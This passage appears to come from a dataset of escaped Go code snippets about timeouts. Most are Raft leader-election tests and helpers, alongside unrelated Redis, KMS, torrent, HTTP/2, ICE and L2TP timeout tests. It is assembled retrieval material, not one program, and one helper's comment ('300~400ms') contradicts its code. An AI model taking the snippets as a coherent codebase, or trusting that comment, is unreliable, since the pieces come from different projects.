2\", r.Term)\n\t}\n\tif r.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateCandidate)\n\t}\n\tif !r.votes[r.id] {\n\t\tt.Errorf(\"vote for self = false, want true\")\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func TestClock_AfterElectionTimeout(t *testing.T) {\n\tc := raft.NewClock()\n\tc.ElectionTimeout = 10 * time.Millisecond\n\tt0 := time.Now()\n\t<-c.AfterElectionTimeout()\n\tif d := time.Since(t0); d < c.ElectionTimeout {\n\t\tt.Fatalf(\"channel fired too soon: %v\", d)\n\t}\n}", "func TestLeaderElectionInOneRoundRPC(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tvotes map[uint64]bool\n\t\tstate StateType\n\t}{\n\t\t// win the election when receiving votes from a majority of the servers\n\t\t{1, map[uint64]bool{}, StateLeader},\n\t\t{3, map[uint64]bool{2: true, 3: true}, StateLeader},\n\t\t{3, map[uint64]bool{2: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true}, StateLeader},\n\n\t\t// return to follower state if it receives vote denial from a majority\n\t\t{3, map[uint64]bool{2: false, 3: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower},\n\n\t\t// stay in candidate if it does not obtain the majority\n\t\t{3, map[uint64]bool{}, StateCandidate},\n\t\t{5, map[uint64]bool{2: true}, StateCandidate},\n\t\t{5, map[uint64]bool{2: false, 3: false}, StateCandidate},\n\t\t{5, map[uint64]bool{}, StateCandidate},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tfor id, vote := range tt.votes {\n\t\t\tr.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote})\n\t\t}\n\n\t\tif r.state != tt.state {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, r.state, tt.state)\n\t\t}\n\t\tif g := r.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, 1)\n\t\t}\n\t}\n}", "func (rf *Raft) resetElectionTimeout() {\n\trf.electionTimeoutStartTime = time.Now()\n\t// randomize election timeout, 300~400ms\n\trf.electionTimeoutInterval = time.Duration(time.Millisecond * time.Duration(500+rand.Intn(300)))\n}", "func TestFreeStuckCandidateWithCheckQuorum(t *testing.T) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(a)\n\tdefer closeAndFreeRaft(b)\n\tdefer closeAndFreeRaft(c)\n\n\ta.checkQuorum = true\n\tb.checkQuorum = true\n\tc.checkQuorum = true\n\n\tnt := newNetwork(a, b, c)\n\tsetRandomizedElectionTimeout(b, b.electionTimeout+1)\n\n\tfor i := 0; i < b.electionTimeout; i++ {\n\t\tb.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(1)\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+1 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+1)\n\t}\n\n\t// Vote again for safety\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+2 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+2)\n\t}\n\n\tnt.recover()\n\tnt.send(pb.Message{From: 1, To: 3, Type: pb.MsgHeartbeat, Term: a.Term})\n\n\t// Disrupt the leader so that the stuck peer is freed\n\tif a.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateFollower)\n\t}\n\n\tif c.Term != a.Term {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, a.Term)\n\t}\n\n\t// Vote again, should become leader this time\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif c.state != StateLeader {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", c.state, StateLeader)\n\t}\n\n}", "func runElectionTimeoutThread(\n\ttimeSinceLastUpdate * time.Time,\n\tisElection * bool,\n\tstate * ServerState,\n\tvoteChannels *[8]chan Vote,\n\tonWinChannel * chan bool,\n\telectionThreadSleepTime time.Duration,\n) {\n\tfor {\n\t\ttimeElapsed := time.Now().Sub(*timeSinceLastUpdate)\n\t\tif timeElapsed.Milliseconds() > ElectionTimeOut { //implements C4.\n\t\t\t*isElection = true // restarts election\n\t\t}\n\n\t\tif *isElection {\n\t\t\t*timeSinceLastUpdate = time.Now()\n\t\t\tgo elect(state, voteChannels, *onWinChannel)\n\t\t}\n\n\t\ttime.Sleep(electionThreadSleepTime)\n\t}\n}", "func Test_TimeoutKeepAlive(t *testing.T) {\n\tkey := \"Test_Keepalive\"\n\twg := new(sync.WaitGroup)\n\n\tconn1, err := redigo.Dial(\"tcp\", RedisHost)\n\n\tif err != nil {\n\t\tt.Errorf(\"redigo.Dial failure due to '%s'\", err)\n\t\treturn\n\t}\n\n\tconn2, err := redigo.Dial(\"tcp\", RedisHost)\n\n\tif err != nil {\n\t\tt.Errorf(\"redigo.Dial failure due to '%s'\", err)\n\t\treturn\n\t}\n\n\tlock1 := New(conn1, key, 1000, 1000, 0, 5)\n\tstatus, err := lock1.Lock()\n\n\tif err != nil || !status {\n\t\tt.Error(\"unable to lock\")\n\t}\n\n\twg.Add(20)\n\tgo func() {\n\t\tfor i := 0; i < 20; i++ {\n\t\t\terr := lock1.KeepAlive()\n\n\t\t\tif err != nil {\n\t\t\t\tt.Errorf(\"timed out during lock contention due to '%v'\", err)\n\t\t\t}\n\n\t\t\twg.Done()\n\t\t\ttime.Sleep(time.Second / 2)\n\t\t}\n\t}()\n\n\ttime.Sleep(time.Second * 2)\n\n\tlock2 := New(conn2, key, 1000, 1000, 0, 5)\n\tstatus, err = lock2.Lock()\n\n\tif status {\n\t\tt.Error(\"should not have been able to lock\")\n\t}\n\n\twg.Wait()\n\ttime.Sleep(time.Second * 2)\n\n\tstatus, err = lock2.Lock()\n\n\tif err != nil || !status {\n\t\tt.Error(\"should have been able to lock\")\n\t}\n}", "func setRandomizedElectionTimeout(r *raft, v int) {\n\tr.randomizedElectionTimeout = v\n}", "func TestTimeouts(t *testing.T) {\n\tt.Parallel()\n\tvar testCases = []struct {\n\t\tdesc string\n\t\tcallTimeout time.Duration\n\t\tpluginDelay time.Duration\n\t\tkubeAPIServerDelay time.Duration\n\t\twantErr string\n\t}{\n\t\t{\n\t\t\tdesc: \"timeout zero - expect failure when call from kube-apiserver arrives before plugin starts\",\n\t\t\tcallTimeout: 0 * time.Second,\n\t\t\tpluginDelay: 3 * time.Second,\n\t\t\twantErr: \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\",\n\t\t},\n\t\t{\n\t\t\tdesc: \"timeout zero but kms-plugin already up - still failure - zero timeout is an invalid value\",\n\t\t\tcallTimeout: 0 * time.Second,\n\t\t\tpluginDelay: 0 * time.Second,\n\t\t\tkubeAPIServerDelay: 2 * time.Second,\n\t\t\twantErr: \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\",\n\t\t},\n\t\t{\n\t\t\tdesc: \"timeout greater than kms-plugin delay - expect success\",\n\t\t\tcallTimeout: 6 * time.Second,\n\t\t\tpluginDelay: 3 * time.Second,\n\t\t},\n\t\t{\n\t\t\tdesc: \"timeout less than kms-plugin delay - expect failure\",\n\t\t\tcallTimeout: 3 * time.Second,\n\t\t\tpluginDelay: 6 * time.Second,\n\t\t\twantErr: \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\",\n\t\t},\n\t}\n\n\tfor _, tt := range testCases {\n\t\ttt := tt\n\t\tt.Run(tt.desc, func(t *testing.T) {\n\t\t\tt.Parallel()\n\t\t\tvar (\n\t\t\t\tservice Service\n\t\t\t\terr error\n\t\t\t\tdata = []byte(\"test data\")\n\t\t\t\tkubeAPIServerWG sync.WaitGroup\n\t\t\t\tkmsPluginWG sync.WaitGroup\n\t\t\t\ttestCompletedWG sync.WaitGroup\n\t\t\t\tsocketName = newEndpoint()\n\t\t\t)\n\n\t\t\ttestCompletedWG.Add(1)\n\t\t\tdefer testCompletedWG.Done()\n\n\t\t\tctx := testContext(t)\n\n\t\t\tkubeAPIServerWG.Add(1)\n\t\t\tgo func() {\n\t\t\t\t// Simulating late start of kube-apiserver - plugin is up before kube-apiserver, if requested by the testcase.\n\t\t\t\ttime.Sleep(tt.kubeAPIServerDelay)\n\n\t\t\t\tservice, err = NewGRPCService(ctx, socketName.endpoint, tt.callTimeout)\n\t\t\t\tif err != nil {\n\t\t\t\t\tt.Errorf(\"failed to create envelope service, error: %v\", err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tdefer destroyService(service)\n\t\t\t\tkubeAPIServerWG.Done()\n\t\t\t\t// Keeping kube-apiserver up to process requests.\n\t\t\t\ttestCompletedWG.Wait()\n\t\t\t}()\n\n\t\t\tkmsPluginWG.Add(1)\n\t\t\tgo func() {\n\t\t\t\t// Simulating delayed start of kms-plugin, kube-apiserver is up before the plugin, if requested by the testcase.\n\t\t\t\ttime.Sleep(tt.pluginDelay)\n\n\t\t\t\t_ = mock.NewBase64Plugin(t, socketName.path)\n\n\t\t\t\tkmsPluginWG.Done()\n\t\t\t\t// Keeping plugin up to process requests.\n\t\t\t\ttestCompletedWG.Wait()\n\t\t\t}()\n\n\t\t\tkubeAPIServerWG.Wait()\n\t\t\tif t.Failed() {\n\t\t\t\treturn\n\t\t\t}\n\t\t\t_, err = service.Encrypt(data)\n\n\t\t\tif err == nil && tt.wantErr != \"\" {\n\t\t\t\tt.Fatalf(\"got nil, want %s\", tt.wantErr)\n\t\t\t}\n\n\t\t\tif err != nil && tt.wantErr == \"\" {\n\t\t\t\tt.Fatalf(\"got %q, want nil\", err.Error())\n\t\t\t}\n\n\t\t\t// Collecting kms-plugin - allowing plugin to clean-up.\n\t\t\tkmsPluginWG.Wait()\n\t\t})\n\t}\n}", "func GetRandomElectionTimeout() time.Duration {\n\treturn time.Duration(minElectionTimeout+rand.Intn(maxElectionTimeout-minElectionTimeout)) * time.Millisecond\n}", "func TestThatAByzantineLeaderCanNotCauseAForkBySendingTwoBlocks(t *testing.T) {\n\ttest.WithContextWithTimeout(t, 15*time.Second, func(ctx context.Context) {\n\t\tblock1 := mocks.ABlock(interfaces.GenesisBlock)\n\t\tnet := network.\n\t\t\tNewTestNetworkBuilder().\n\t\t\tWithNodeCount(4).\n\t\t\tWithTimeBasedElectionTrigger(1000 * time.Millisecond).\n\t\t\tWithBlocks(block1).\n\t\t\tBuild(ctx)\n\n\t\tnode0 := net.Nodes[0]\n\t\tnode1 := net.Nodes[1]\n\t\tnode2 := net.Nodes[2]\n\n\t\tnode0.Communication.SetOutgoingWhitelist([]primitives.MemberId{\n\t\t\tnode1.MemberId,\n\t\t\tnode2.MemberId,\n\t\t})\n\n\t\t// the leader (node0) is suggesting block1 to node1 and node2 (not to node3)\n\t\tnet.StartConsensus(ctx)\n\n\t\t// node0, node1 and node2 should reach consensus\n\t\tnet.WaitUntilNodesEventuallyCommitASpecificBlock(ctx, t, 0, block1, node0, node1, node2)\n\t})\n}", "func (rf *Raft) resetElectionTimeout() time.Duration {\n\trand.Seed(time.Now().UTC().UnixNano())\n\trf.randomizedElectionTimeout = rf.electionTimeout + time.Duration(rand.Int63n(rf.electionTimeout.Nanoseconds()))\n\treturn rf.randomizedElectionTimeout\n}", "func (s *Server) checkTimeouts() {\n\ts.Debug(\"checking for timeouts\")\n\tfor _, peer := range s.peers {\n\t\t// if the echoTimeout flag is set, it means we didn't receive a response to our last request\n\t\tif peer.echoTimeout {\n\t\t\ts.WithFields(logrus.Fields{\n\t\t\t\t\"peer_name\": peer.name,\n\t\t\t\t\"peer_addr\": peer.addr,\n\t\t\t\t\"id\": peer.echoCounter,\n\t\t\t}).Debug(\"echo timeout\")\n\t\t\ts.promPeerTimeout.WithLabelValues(s.config.NodeName, peer.name).Inc()\n\t\t\ts.updatePeerStatus(peer, Timeout)\n\t\t}\n\t}\n}", "func TestErrorTimeout(t *testing.T) {\n\ttimeout = true\n\tgo createServer()\n\tcreateUser()\n\tloginClient()\n}", "func TestHalfOpenConnsLimit(t *testing.T) {\n\tcfg := testingConfig()\n\tcfg.DialTimeout = time.Millisecond\n\tcfg.BaseDir = \"./leecher\"\n\tcl, err := NewClient(cfg)\n\ttr, err := cl.AddFromFile(helloWorldTorrentFile)\n\trequire.NoError(t, err)\n\ttr.StartDataTransfer()\n\taddInvalidPeers := func(invalidAddrPrefix string) {\n\t\tpeers := []Peer{}\n\t\tfor i := 0; i <= 255; i++ {\n\t\t\tpeers = append(peers, addrToPeer(invalidAddrPrefix+strconv.Itoa(i)+\":9090\", SourceUser))\n\t\t}\n\t\trequire.NoError(t, tr.AddPeers(peers...))\n\t}\n\t//these are invalid IP addreses (https://stackoverflow.com/questions/10456044/what-is-a-good-invalid-ip-address-to-use-for-unit-tests)\n\taddInvalidPeers(\"192.0.2.\")\n\taddInvalidPeers(\"198.51.100.\")\n\taddInvalidPeers(\"203.0.113.\")\n\t//wait until we have tried to connect to all peers\n\tfailure := time.NewTimer(10 * time.Second)\n\tfor {\n\t\ttime.Sleep(30 * time.Millisecond)\n\t\t//hacky way to get all conns that we tried to dial but failed\n\t\ttried, err := strconv.Atoi(cl.counters.Get(\"could not dial\").String())\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\tif tried >= 3*256 {\n\t\t\t//we tried all conns\n\t\t\tbreak\n\t\t}\n\t\tselect {\n\t\tcase <-failure.C:\n\t\t\tt.FailNow()\n\t\tdefault:\n\t\t}\n\t}\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func Test_TaskOption_LeadershipTimeout(t *testing.T) {\n\t// given\n\toption := crontask.LeadershipTimeout(time.Second)\n\toptions := &crontask.TaskOptions{LeadershipTimeout: time.Hour}\n\n\t// when\n\toption(options)\n\n\t// then\n\tif options.LeadershipTimeout != time.Second {\n\t\tt.Errorf(\"leadership timeout not correctly applied, got %s\", options.LeadershipTimeout)\n\t}\n}", "func TestTimeout(t *testing.T) {\n\tserver := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\ttime.Sleep(5 * time.Second)\n\t}))\n\tclient := SearchClient{allowedAccessToken, server.URL}\n\tdefer server.Close()\n\n\t_, err := client.FindUsers(SearchRequest{})\n\n\tif err == nil {\n\t\tt.Errorf(\"empty error, must be timeout error\")\n\t} else if !strings.Contains(err.Error(), \"timeout for\") {\n\t\tt.Errorf(\"unexpected error: %v\", err.Error())\n\t}\n}", "func TestConnectionStateFailedDeleteAllCandidates(t *testing.T) {\n\treport := test.CheckRoutines(t)\n\tdefer report()\n\n\tlim := test.TimeOut(time.Second * 5)\n\tdefer lim.Stop()\n\n\toneSecond := time.Second\n\tKeepaliveInterval := time.Duration(0)\n\n\tcfg := &AgentConfig{\n\t\tNetworkTypes: supportedNetworkTypes(),\n\t\tDisconnectedTimeout: &oneSecond,\n\t\tFailedTimeout: &oneSecond,\n\t\tKeepaliveInterval: &KeepaliveInterval,\n\t}\n\n\taAgent, err := NewAgent(cfg)\n\tassert.NoError(t, err)\n\n\tbAgent, err := NewAgent(cfg)\n\tassert.NoError(t, err)\n\n\tisFailed := make(chan interface{})\n\tassert.NoError(t, aAgent.OnConnectionStateChange(func(c ConnectionState) {\n\t\tif c == ConnectionStateFailed {\n\t\t\tclose(isFailed)\n\t\t}\n\t}))\n\n\tconnect(aAgent, bAgent)\n\t<-isFailed\n\n\tdone := make(chan struct{})\n\tassert.NoError(t, aAgent.run(context.Background(), func(ctx context.Context, agent *Agent) {\n\t\tassert.Equal(t, len(aAgent.remoteCandidates), 0)\n\t\tassert.Equal(t, len(aAgent.localCandidates), 0)\n\t\tclose(done)\n\t}))\n\t<-done\n\n\tassert.NoError(t, aAgent.Close())\n\tassert.NoError(t, bAgent.Close())\n}", "func (state *ServerState) TimeoutStateTransition() {\n\n\tif state.IsFollower() {\n\t\tstate.curState = CANDIDATE\n\t\tstate.votedFor = -1\n\t\tstate.currentTerm++\n\t} else if state.IsCandidate() {\n\t\t//Candidates who timeout keep being candidates\n\t\tstate.votedFor = -1\n\t\tstate.currentTerm++\n\t} else if state.IsLeader() {\n\t\tfmt.Println(\"WARNING: timedout as a leader\")\n\t\t//Leaders should not timeout\n\t}\n}", "func TestRaftLeaderLeaseLost(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftLeaderLeaseLost\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn2.ProposeInitialMembership([]string{ID1, ID2})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t}\n\n\t// Create a network partition between \"1\" and \"2\", so leader will lost its leader lease eventually.\n\tn1.transport.(*msgDropper).Set(ID2, 1)\n\tn2.transport.(*msgDropper).Set(ID1, 1)\n\n\t// The leader will lose its leadership eventually because it can't talk to\n\t// the other node.\n\t<-leader.fsm.(*testFSM).followerCh\n}", "func TestNodeWithSmallerTermCanCompleteElection(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\t// cause a network partition to isolate node 3\n\tnt := newNetwork(n1, n2, n3)\n\tnt.cut(1, 3)\n\tnt.cut(2, 3)\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// a.Term == 3\n\t// b.Term == 3\n\t// c.Term == 1\n\tsm = nt.peers[1].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 1 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 1 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 1)\n\t}\n\n\t// check state\n\t// a == follower\n\t// b == leader\n\t// c == pre-candidate\n\tsm = nt.peers[1].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tsm.logger.Infof(\"going to bring back peer 3 and kill peer 2\")\n\t// recover the network then immediately isolate b which is currently\n\t// the leader, this is to emulate the crash of b.\n\tnt.recover()\n\tnt.cut(2, 1)\n\tnt.cut(2, 3)\n\n\t// call for election\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// do we have a leader?\n\tsma := nt.peers[1].(*raft)\n\tsmb := nt.peers[3].(*raft)\n\tif sma.state != StateLeader && smb.state != StateLeader {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func TestTransportTimeoutServerHangs(t *testing.T) {\n\tclientDone := make(chan struct{})\n\tct := newClientTester(t)\n\tct.client = func() error {\n\t\tdefer ct.cc.(*net.TCPConn).CloseWrite()\n\t\tdefer close(clientDone)\n\n\t\tbuf := make([]byte, 1<<19)\n\t\t_, err := rand.Read(buf)\n\t\tif err != nil {\n\t\t\tt.Fatal(\"fail to gen random data\")\n\t\t}\n\t\theaderVal := hex.EncodeToString(buf)\n\n\t\treq, err := http.NewRequest(\"PUT\", \"https://dummy.tld/\", nil)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tctx, cancel := context.WithTimeout(context.Background(), 1*time.Second)\n\t\tdefer cancel()\n\t\treq = req.WithContext(ctx)\n\t\treq.Header.Add(\"Authorization\", headerVal)\n\t\t_, err = ct.tr.RoundTrip(req)\n\t\tif err == nil {\n\t\t\treturn errors.New(\"error should not be nil\")\n\t\t}\n\t\tif ne, ok := err.(net.Error); !ok || !ne.Timeout() {\n\t\t\treturn fmt.Errorf(\"error should be a net error timeout was: +%v\", err)\n\t\t}\n\t\treturn nil\n\t}\n\tct.server = func() error {\n\t\tct.greet()\n\t\tselect {\n\t\tcase <-time.After(5 * time.Second):\n\t\tcase <-clientDone:\n\t\t}\n\t\treturn nil\n\t}\n\tct.run()\n}", "func TestMultipleHeartbeatTimeout(t *testing.T) {\n\ts := NewSupervisor(nil)\n\traa := NewRecoverableAction(s)\n\trab := NewRecoverableAction(s)\n\trac := NewRecoverableAction(s)\n\n\ts.AddRecoverable(\"A\", raa)\n\ts.AddRecoverable(\"B\", rab)\n\ts.AddRecoverable(\"C\", rac)\n\n\tt.Logf(\"(A) is '%v'.\", raa.Action(TimeConsumingAction))\n\tt.Logf(\"(B) is '%v'.\", rab.Action(PositiveAction))\n\tt.Logf(\"(C) is '%v'.\", rac.Action(PositiveAction))\n}", "func testQuiescentTunnels(t *testing.T) {\n\tcases := []struct {\n\t\tname string\n\t\tcfg TunnelConfig\n\t\texpectFail bool\n\t}{\n\t\t{\n\t\t\tname: \"reject L2TPv2 IP encap\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"127.0.0.1:6000\",\n\t\t\t\tPeer: \"localhost:5000\",\n\t\t\t\tVersion: ProtocolVersion2,\n\t\t\t\tTunnelID: 1,\n\t\t\t\tPeerTunnelID: 1001,\n\t\t\t\tEncap: EncapTypeIP,\n\t\t\t},\n\t\t\t// L2TPv2 doesn't support IP encap\n\t\t\texpectFail: true,\n\t\t},\n\t\t{\n\t\t\tname: \"reject L2TPv2 config with no tunnel IDs\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"127.0.0.1:6000\",\n\t\t\t\tPeer: \"localhost:5000\",\n\t\t\t\tVersion: ProtocolVersion2,\n\t\t\t\tEncap: EncapTypeUDP,\n\t\t\t},\n\t\t\t// Must call out tunnel IDs\n\t\t\texpectFail: true,\n\t\t},\n\t\t{\n\t\t\tname: \"reject L2TPv3 config with no tunnel IDs\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"127.0.0.1:6000\",\n\t\t\t\tPeer: \"localhost:5000\",\n\t\t\t\tVersion: ProtocolVersion3,\n\t\t\t\tEncap: EncapTypeUDP,\n\t\t\t},\n\t\t\t// Must call out control connection IDs\n\t\t\texpectFail: true,\n\t\t},\n\t\t{\n\t\t\tname: \"L2TPv2 UDP AF_INET\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"127.0.0.1:6000\",\n\t\t\t\tPeer: \"localhost:5000\",\n\t\t\t\tVersion: ProtocolVersion2,\n\t\t\t\tTunnelID: 1,\n\t\t\t\tPeerTunnelID: 1001,\n\t\t\t\tEncap: EncapTypeUDP,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"L2TPv2 UDP AF_INET6\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"[::1]:6000\",\n\t\t\t\tPeer: \"[::1]:5000\",\n\t\t\t\tVersion: ProtocolVersion2,\n\t\t\t\tTunnelID: 2,\n\t\t\t\tPeerTunnelID: 1002,\n\t\t\t\tEncap: EncapTypeUDP,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"L2TPv3 UDP AF_INET\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"127.0.0.1:6000\",\n\t\t\t\tPeer: \"localhost:5000\",\n\t\t\t\tVersion: ProtocolVersion3,\n\t\t\t\tTunnelID: 3,\n\t\t\t\tPeerTunnelID: 1003,\n\t\t\t\tEncap: EncapTypeUDP,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"L2TPv3 UDP AF_INET6\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"[::1]:6000\",\n\t\t\t\tPeer: \"[::1]:5000\",\n\t\t\t\tVersion: ProtocolVersion3,\n\t\t\t\tTunnelID: 4,\n\t\t\t\tPeerTunnelID: 1004,\n\t\t\t\tEncap: EncapTypeUDP,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"L2TPv3 IP AF_INET\",\n\t\t\tcfg: TunnelConfig{\n\t\t\t\tLocal: \"127.0.0.1:6000\",\n\t\t\t\tPeer: \"localhost:5000\",\n\t\t\t\tVersion: ProtocolVersion3,\n\t\t\t\tTunnelID: 5,\n\t\t\t\tPeerTunnelID: 1005,\n\t\t\t\tEncap: EncapTypeIP,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tname: \"L2TPv3 IP 